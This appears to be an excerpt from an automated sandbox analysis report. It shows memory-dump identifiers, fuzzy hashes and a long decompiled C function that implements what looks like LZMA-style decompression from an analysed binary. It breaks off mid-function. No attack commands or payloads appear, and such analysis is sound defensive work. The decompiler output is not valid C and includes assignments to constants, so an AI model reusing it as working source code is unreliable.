                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 8ad8b3a7fce677aa33c13c02e3180aa90519ee056083dbfcd0f6a1ae91265e6c
                                                                                                                          • Instruction ID: 95af8839098f806f541805b71f16133a603fad5641f47eebb8f014e75b9041d1
                                                                                                                          • Opcode Fuzzy Hash: 8ad8b3a7fce677aa33c13c02e3180aa90519ee056083dbfcd0f6a1ae91265e6c
                                                                                                                          • Instruction Fuzzy Hash: 58A13371D00229CBDF28CFA8C8447ADBBB1FF44305F25856AD856BB281D7789A86DF44
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 98%
                                                                                                                          			E004065DE() {
                                                                                                                          				void _t533;
                                                                                                                          				signed int _t534;
                                                                                                                          				signed int _t535;
                                                                                                                          				signed int* _t605;
                                                                                                                          				void* _t612;
                                                                                                                          
                                                                                                                          				L0:
                                                                                                                          				while(1) {
                                                                                                                          					L0:
                                                                                                                          					if( *(_t612 - 0x40) != 0) {
                                                                                                                          						 *(_t612 - 0x84) = 0x13;
                                                                                                                          						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
                                                                                                                          						goto L132;
                                                                                                                          					} else {
                                                                                                                          						__eax =  *(__ebp - 0x4c);
                                                                                                                          						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                                                          						__ecx =  *(__ebp - 0x58);
                                                                                                                          						__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                          						__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                                                          						L130:
                                                                                                                          						 *(__ebp - 0x58) = __eax;
                                                                                                                          						 *(__ebp - 0x40) = 3;
                                                                                                                          						L144:
                                                                                                                          						 *(__ebp - 0x7c) = 0x14;
                                                                                                                          						L145:
                                                                                                                          						__eax =  *(__ebp - 0x40);
                                                                                                                          						 *(__ebp - 0x50) = 1;
                                                                                                                          						 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                                                          						L149:
                                                                                                                          						if( *(__ebp - 0x48) <= 0) {
                                                                                                                          							__ecx =  *(__ebp - 0x40);
                                                                                                                          							__ebx =  *(__ebp - 0x50);
                                                                                                                          							0 = 1;
                                                                                                                          							__eax = 1 << __cl;
                                                                                                                          							__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                                                          							__eax =  *(__ebp - 0x7c);
                                                                                                                          							 *(__ebp - 0x44) = __ebx;
                                                                                                                          							while(1) {
                                                                                                                          								L140:
                                                                                                                          								 *(_t612 - 0x88) = _t533;
                                                                                                                          								while(1) {
                                                                                                                          									L1:
                                                                                                                          									_t534 =  *(_t612 - 0x88);
                                                                                                                          									if(_t534 > 0x1c) {
                                                                                                                          										break;
                                                                                                                          									}
                                                                                                                          									switch( *((intOrPtr*)(_t534 * 4 +  &M0040684B))) {
                                                                                                                          										case 0:
                                                                                                                          											if( *(_t612 - 0x6c) == 0) {
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                                                                          											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                                                                                          											_t534 =  *( *(_t612 - 0x70));
                                                                                                                          											if(_t534 > 0xe1) {
                                                                                                                          												goto L171;
                                                                                                                          											}
                                                                                                                          											_t538 = _t534 & 0x000000ff;
                                                                                                                          											_push(0x2d);
                                                                                                                          											asm("cdq");
                                                                                                                          											_pop(_t569);
                                                                                                                          											_push(9);
                                                                                                                          											_pop(_t570);
                                                                                                                          											_t608 = _t538 / _t569;
                                                                                                                          											_t540 = _t538 % _t569 & 0x000000ff;
                                                                                                                          											asm("cdq");
                                                                                                                          											_t603 = _t540 % _t570 & 0x000000ff;
                                                                                                                          											 *(_t612 - 0x3c) = _t603;
                                                                                                                          											 *(_t612 - 0x1c) = (1 << _t608) - 1;
                                                                                                                          											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
                                                                                                                          											_t611 = (0x300 << _t603 + _t608) + 0x736;
                                                                                                                          											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
                                                                                                                          												L10:
                                                                                                                          												if(_t611 == 0) {
                                                                                                                          													L12:
                                                                                                                          													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
                                                                                                                          													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                                                                                                          													goto L15;
                                                                                                                          												} else {
                                                                                                                          													goto L11;
                                                                                                                          												}
                                                                                                                          												do {
                                                                                                                          													L11:
                                                                                                                          													_t611 = _t611 - 1;
                                                                                                                          													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
                                                                                                                          												} while (_t611 != 0);
                                                                                                                          												goto L12;
                                                                                                                          											}
                                                                                                                          											if( *(_t612 - 4) != 0) {
                                                                                                                          												GlobalFree( *(_t612 - 4));
                                                                                                                          											}
                                                                                                                          											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                          											 *(_t612 - 4) = _t534;
                                                                                                                          											if(_t534 == 0) {
                                                                                                                          												goto L171;
                                                                                                                          											} else {
                                                                                                                          												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
                                                                                                                          												goto L10;
                                                                                                                          											}
                                                                                                                          										case 1:
                                                                                                                          											L13:
                                                                                                                          											__eflags =  *(_t612 - 0x6c);
                                                                                                                          											if( *(_t612 - 0x6c) == 0) {
                                                                                                                          												 *(_t612 - 0x88) = 1;
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                                                                          											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
                                                                                                                          											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                                                                                          											_t45 = _t612 - 0x48;
                                                                                                                          											 *_t45 =  *(_t612 - 0x48) + 1;
                                                                                                                          											__eflags =  *_t45;
                                                                                                                          											L15:
                                                                                                                          											if( *(_t612 - 0x48) < 4) {
                                                                                                                          												goto L13;
                                                                                                                          											}
                                                                                                                          											_t546 =  *(_t612 - 0x40);
                                                                                                                          											if(_t546 ==  *(_t612 - 0x74)) {
                                                                                                                          												L20:
                                                                                                                          												 *(_t612 - 0x48) = 5;
                                                                                                                          												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
                                                                                                                          												goto L23;
                                                                                                                          											}
                                                                                                                          											 *(_t612 - 0x74) = _t546;
                                                                                                                          											if( *(_t612 - 8) != 0) {
                                                                                                                          												GlobalFree( *(_t612 - 8)); // executed
                                                                                                                          											}
                                                                                                                          											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
                                                                                                                          											 *(_t612 - 8) = _t534;
                                                                                                                          											if(_t534 == 0) {
                                                                                                                          												goto L171;
                                                                                                                          											} else {
                                                                                                                          												goto L20;
                                                                                                                          											}
                                                                                                                          										case 2:
                                                                                                                          											L24:
                                                                                                                          											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
                                                                                                                          											 *(_t612 - 0x84) = 6;
                                                                                                                          											 *(_t612 - 0x4c) = _t553;
                                                                                                                          											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
                                                                                                                          											goto L132;
                                                                                                                          										case 3:
                                                                                                                          											L21:
                                                                                                                          											__eflags =  *(_t612 - 0x6c);
                                                                                                                          											if( *(_t612 - 0x6c) == 0) {
                                                                                                                          												 *(_t612 - 0x88) = 3;
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                                                                          											_t67 = _t612 - 0x70;
                                                                                                                          											 *_t67 =  &(( *(_t612 - 0x70))[1]);
                                                                                                                          											__eflags =  *_t67;
                                                                                                                          											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                                                                                                          											L23:
                                                                                                                          											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
                                                                                                                          											if( *(_t612 - 0x48) != 0) {
                                                                                                                          												goto L21;
                                                                                                                          											}
                                                                                                                          											goto L24;
                                                                                                                          										case 4:
                                                                                                                          											L133:
                                                                                                                          											_t531 =  *_t605;
                                                                                                                          											_t588 = _t531 & 0x0000ffff;
                                                                                                                          											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
                                                                                                                          											if( *(_t612 - 0xc) >= _t564) {
                                                                                                                          												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
                                                                                                                          												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
                                                                                                                          												 *(_t612 - 0x40) = 1;
                                                                                                                          												_t532 = _t531 - (_t531 >> 5);
                                                                                                                          												__eflags = _t532;
                                                                                                                          												 *_t605 = _t532;
                                                                                                                          											} else {
                                                                                                                          												 *(_t612 - 0x10) = _t564;
                                                                                                                          												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                                                                                                          												 *_t605 = (0x800 - _t588 >> 5) + _t531;
                                                                                                                          											}
                                                                                                                          											if( *(_t612 - 0x10) >= 0x1000000) {
                                                                                                                          												goto L139;
                                                                                                                          											} else {
                                                                                                                          												goto L137;
                                                                                                                          											}
                                                                                                                          										case 5:
                                                                                                                          											L137:
                                                                                                                          											if( *(_t612 - 0x6c) == 0) {
                                                                                                                          												 *(_t612 - 0x88) = 5;
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
                                                                                                                          											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                                                                          											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                                                                                          											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                                                                                                          											L139:
                                                                                                                          											_t533 =  *(_t612 - 0x84);
                                                                                                                          											goto L140;
                                                                                                                          										case 6:
                                                                                                                          											__edx = 0;
                                                                                                                          											__eflags =  *(__ebp - 0x40);
                                                                                                                          											if( *(__ebp - 0x40) != 0) {
                                                                                                                          												__eax =  *(__ebp - 4);
                                                                                                                          												__ecx =  *(__ebp - 0x38);
                                                                                                                          												 *(__ebp - 0x34) = 1;
                                                                                                                          												 *(__ebp - 0x84) = 7;
                                                                                                                          												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                                                          												goto L132;
                                                                                                                          											}
                                                                                                                          											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                          											__esi =  *(__ebp - 0x60);
                                                                                                                          											__cl = 8;
                                                                                                                          											__cl = 8 -  *(__ebp - 0x3c);
                                                                                                                          											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                          											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                          											__ecx =  *(__ebp - 0x3c);
                                                                                                                          											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                          											__ecx =  *(__ebp - 4);
                                                                                                                          											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                          											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                                                          											__eflags =  *(__ebp - 0x38) - 4;
                                                                                                                          											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                          											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                          											if( *(__ebp - 0x38) >= 4) {
                                                                                                                          												__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                                                          												if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                          													_t98 = __ebp - 0x38;
                                                                                                                          													 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                                                          													__eflags =  *_t98;
                                                                                                                          												} else {
                                                                                                                          													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                          												}
                                                                                                                          											} else {
                                                                                                                          												 *(__ebp - 0x38) = 0;
                                                                                                                          											}
                                                                                                                          											__eflags =  *(__ebp - 0x34) - __edx;
                                                                                                                          											if( *(__ebp - 0x34) == __edx) {
                                                                                                                          												__ebx = 0;
                                                                                                                          												__ebx = 1;
                                                                                                                          												goto L61;
                                                                                                                          											} else {
                                                                                                                          												__eax =  *(__ebp - 0x14);
                                                                                                                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                          												__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                          												if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                          													__eax = __eax +  *(__ebp - 0x74);
                                                                                                                          													__eflags = __eax;
                                                                                                                          												}
                                                                                                                          												__ecx =  *(__ebp - 8);
                                                                                                                          												__ebx = 0;
                                                                                                                          												__ebx = 1;
                                                                                                                          												__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                          												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                          												goto L41;
                                                                                                                          											}
                                                                                                                          										case 7:
                                                                                                                          											__eflags =  *(__ebp - 0x40) - 1;
                                                                                                                          											if( *(__ebp - 0x40) != 1) {
                                                                                                                          												__eax =  *(__ebp - 0x24);
                                                                                                                          												 *(__ebp - 0x80) = 0x16;
                                                                                                                          												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                          												__eax =  *(__ebp - 0x28);
                                                                                                                          												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                          												__eax =  *(__ebp - 0x2c);
                                                                                                                          												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                          												__eax = 0;
                                                                                                                          												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                          												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                          												__al = __al & 0x000000fd;
                                                                                                                          												__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                                                          												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                                                          												__eax =  *(__ebp - 4);
                                                                                                                          												__eax =  *(__ebp - 4) + 0x664;
                                                                                                                          												__eflags = __eax;
                                                                                                                          												 *(__ebp - 0x58) = __eax;
                                                                                                                          												goto L69;
                                                                                                                          											}
                                                                                                                          											__eax =  *(__ebp - 4);
                                                                                                                          											__ecx =  *(__ebp - 0x38);
                                                                                                                          											 *(__ebp - 0x84) = 8;
                                                                                                                          											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                                                          											goto L132;
                                                                                                                          										case 8:
                                                                                                                          											__eflags =  *(__ebp - 0x40);
                                                                                                                          											if( *(__ebp - 0x40) != 0) {
                                                                                                                          												__eax =  *(__ebp - 4);
                                                                                                                          												__ecx =  *(__ebp - 0x38);
                                                                                                                          												 *(__ebp - 0x84) = 0xa;
                                                                                                                          												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                                                          											} else {
                                                                                                                          												__eax =  *(__ebp - 0x38);
                                                                                                                          												__ecx =  *(__ebp - 4);
                                                                                                                          												__eax =  *(__ebp - 0x38) + 0xf;
                                                                                                                          												 *(__ebp - 0x84) = 9;
                                                                                                                          												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                                                          												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                                                          											}
                                                                                                                          											goto L132;
                                                                                                                          										case 9:
                                                                                                                          											__eflags =  *(__ebp - 0x40);
                                                                                                                          											if( *(__ebp - 0x40) != 0) {
                                                                                                                          												goto L90;
                                                                                                                          											}
                                                                                                                          											__eflags =  *(__ebp - 0x60);
                                                                                                                          											if( *(__ebp - 0x60) == 0) {
                                                                                                                          												goto L171;
                                                                                                                          											}
                                                                                                                          											__eax = 0;
                                                                                                                          											__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                          											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                          											__eflags = _t259;
                                                                                                                          											0 | _t259 = _t259 + _t259 + 9;
                                                                                                                          											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                                                                                          											goto L76;
                                                                                                                          										case 0xa:
                                                                                                                          											__eflags =  *(__ebp - 0x40);
                                                                                                                          											if( *(__ebp - 0x40) != 0) {
                                                                                                                          												__eax =  *(__ebp - 4);
                                                                                                                          												__ecx =  *(__ebp - 0x38);
                                                                                                                          												 *(__ebp - 0x84) = 0xb;
                                                                                                                          												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                                                          												goto L132;
                                                                                                                          											}
                                                                                                                          											__eax =  *(__ebp - 0x28);
                                                                                                                          											goto L89;
                                                                                                                          										case 0xb:
                                                                                                                          											__eflags =  *(__ebp - 0x40);
                                                                                                                          											if( *(__ebp - 0x40) != 0) {
                                                                                                                          												__ecx =  *(__ebp - 0x24);
                                                                                                                          												__eax =  *(__ebp - 0x20);
                                                                                                                          												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                          											} else {
                                                                                                                          												__eax =  *(__ebp - 0x24);
                                                                                                                          											}
                                                                                                                          											__ecx =  *(__ebp - 0x28);
                                                                                                                          											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                          											L89:
                                                                                                                          											__ecx =  *(__ebp - 0x2c);
                                                                                                                          											 *(__ebp - 0x2c) = __eax;
                                                                                                                          											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                          											L90:
                                                                                                                          											__eax =  *(__ebp - 4);
                                                                                                                          											 *(__ebp - 0x80) = 0x15;
                                                                                                                          											__eax =  *(__ebp - 4) + 0xa68;
                                                                                                                          											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                                                          											goto L69;
                                                                                                                          										case 0xc:
                                                                                                                          											L100:
                                                                                                                          											__eflags =  *(__ebp - 0x6c);
                                                                                                                          											if( *(__ebp - 0x6c) == 0) {
                                                                                                                          												 *(__ebp - 0x88) = 0xc;
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											__ecx =  *(__ebp - 0x70);
                                                                                                                          											__eax =  *(__ebp - 0xc);
                                                                                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											_t335 = __ebp - 0x70;
                                                                                                                          											 *_t335 =  *(__ebp - 0x70) + 1;
                                                                                                                          											__eflags =  *_t335;
                                                                                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											__eax =  *(__ebp - 0x2c);
                                                                                                                          											goto L102;
                                                                                                                          										case 0xd:
                                                                                                                          											L37:
                                                                                                                          											__eflags =  *(__ebp - 0x6c);
                                                                                                                          											if( *(__ebp - 0x6c) == 0) {
                                                                                                                          												 *(__ebp - 0x88) = 0xd;
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											__ecx =  *(__ebp - 0x70);
                                                                                                                          											__eax =  *(__ebp - 0xc);
                                                                                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											_t122 = __ebp - 0x70;
                                                                                                                          											 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                                                          											__eflags =  *_t122;
                                                                                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											L39:
                                                                                                                          											__eax =  *(__ebp - 0x40);
                                                                                                                          											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                          											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                                                          												goto L48;
                                                                                                                          											}
                                                                                                                          											__eflags = __ebx - 0x100;
                                                                                                                          											if(__ebx >= 0x100) {
                                                                                                                          												goto L54;
                                                                                                                          											}
                                                                                                                          											L41:
                                                                                                                          											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                          											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                          											__ecx =  *(__ebp - 0x58);
                                                                                                                          											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                          											 *(__ebp - 0x48) = __eax;
                                                                                                                          											__eax = __eax + 1;
                                                                                                                          											__eax = __eax << 8;
                                                                                                                          											__eax = __eax + __ebx;
                                                                                                                          											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                          											__ax =  *__esi;
                                                                                                                          											 *(__ebp - 0x54) = __esi;
                                                                                                                          											__edx = __ax & 0x0000ffff;
                                                                                                                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                          											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                          											if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                          												__cx = __ax;
                                                                                                                          												 *(__ebp - 0x40) = 1;
                                                                                                                          												__cx = __ax >> 5;
                                                                                                                          												__eflags = __eax;
                                                                                                                          												__ebx = __ebx + __ebx + 1;
                                                                                                                          												 *__esi = __ax;
                                                                                                                          											} else {
                                                                                                                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                          												 *(__ebp - 0x10) = __ecx;
                                                                                                                          												0x800 = 0x800 - __edx;
                                                                                                                          												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                          												__ebx = __ebx + __ebx;
                                                                                                                          												 *__esi = __cx;
                                                                                                                          											}
                                                                                                                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                          											 *(__ebp - 0x44) = __ebx;
                                                                                                                          											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          												goto L39;
                                                                                                                          											} else {
                                                                                                                          												goto L37;
                                                                                                                          											}
                                                                                                                          										case 0xe:
                                                                                                                          											L46:
                                                                                                                          											__eflags =  *(__ebp - 0x6c);
                                                                                                                          											if( *(__ebp - 0x6c) == 0) {
                                                                                                                          												 *(__ebp - 0x88) = 0xe;
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											__ecx =  *(__ebp - 0x70);
                                                                                                                          											__eax =  *(__ebp - 0xc);
                                                                                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											_t156 = __ebp - 0x70;
                                                                                                                          											 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                                                          											__eflags =  *_t156;
                                                                                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											while(1) {
                                                                                                                          												L48:
                                                                                                                          												__eflags = __ebx - 0x100;
                                                                                                                          												if(__ebx >= 0x100) {
                                                                                                                          													break;
                                                                                                                          												}
                                                                                                                          												__eax =  *(__ebp - 0x58);
                                                                                                                          												__edx = __ebx + __ebx;
                                                                                                                          												__ecx =  *(__ebp - 0x10);
                                                                                                                          												__esi = __edx + __eax;
                                                                                                                          												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                          												__ax =  *__esi;
                                                                                                                          												 *(__ebp - 0x54) = __esi;
                                                                                                                          												__edi = __ax & 0x0000ffff;
                                                                                                                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                          												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                          												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                          													__cx = __ax;
                                                                                                                          													_t170 = __edx + 1; // 0x1
                                                                                                                          													__ebx = _t170;
                                                                                                                          													__cx = __ax >> 5;
                                                                                                                          													__eflags = __eax;
                                                                                                                          													 *__esi = __ax;
                                                                                                                          												} else {
                                                                                                                          													 *(__ebp - 0x10) = __ecx;
                                                                                                                          													0x800 = 0x800 - __edi;
                                                                                                                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                          													__ebx = __ebx + __ebx;
                                                                                                                          													 *__esi = __cx;
                                                                                                                          												}
                                                                                                                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                          												 *(__ebp - 0x44) = __ebx;
                                                                                                                          												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          													continue;
                                                                                                                          												} else {
                                                                                                                          													goto L46;
                                                                                                                          												}
                                                                                                                          											}
                                                                                                                          											L54:
                                                                                                                          											_t173 = __ebp - 0x34;
                                                                                                                          											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                          											__eflags =  *_t173;
                                                                                                                          											goto L55;
                                                                                                                          										case 0xf:
                                                                                                                          											L58:
                                                                                                                          											__eflags =  *(__ebp - 0x6c);
                                                                                                                          											if( *(__ebp - 0x6c) == 0) {
                                                                                                                          												 *(__ebp - 0x88) = 0xf;
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											__ecx =  *(__ebp - 0x70);
                                                                                                                          											__eax =  *(__ebp - 0xc);
                                                                                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											_t203 = __ebp - 0x70;
                                                                                                                          											 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                                                          											__eflags =  *_t203;
                                                                                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											L60:
                                                                                                                          											__eflags = __ebx - 0x100;
                                                                                                                          											if(__ebx >= 0x100) {
                                                                                                                          												L55:
                                                                                                                          												__al =  *(__ebp - 0x44);
                                                                                                                          												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                          												goto L56;
                                                                                                                          											}
                                                                                                                          											L61:
                                                                                                                          											__eax =  *(__ebp - 0x58);
                                                                                                                          											__edx = __ebx + __ebx;
                                                                                                                          											__ecx =  *(__ebp - 0x10);
                                                                                                                          											__esi = __edx + __eax;
                                                                                                                          											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                          											__ax =  *__esi;
                                                                                                                          											 *(__ebp - 0x54) = __esi;
                                                                                                                          											__edi = __ax & 0x0000ffff;
                                                                                                                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                          											__eflags =  *(__ebp - 0xc) - __ecx;
